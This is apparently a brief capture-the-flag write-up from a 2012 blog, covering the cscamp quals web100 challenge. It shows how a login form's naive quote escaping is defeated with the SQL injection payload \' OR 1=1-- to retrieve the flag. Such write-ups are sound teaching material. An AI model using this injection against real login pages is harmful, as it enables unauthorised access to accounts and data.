Monday, November 12, 2012

[CTF] cscamp quals: web100


Visiting  http://176.9.193.13/SimplEL0g1n.php we get a response containing a form asking for a password.
You need a valid login to get the key : <input name="login" type="text">
    <input value="login" type="submit">
   </div>
Trying ddd as password, we get as a response.
For Obzitto : >>> select * from login where password='ddd'
wrong password, access blocked, try after 2 mn 
Trying ddd', we get as a response.
For Obzitto : >>> select * from login where password='ddd\''
wrong password, access blocked, try after 2 mn 
Let's escape the escape! providing as a password: \' OR 1=1-- 
For Obzitto : >>> select * from login where password='\\' OR 1=1-- '
Congratz : b9d4ee2d0586673a1cda99f87e1b9368

No comments:

Post a Comment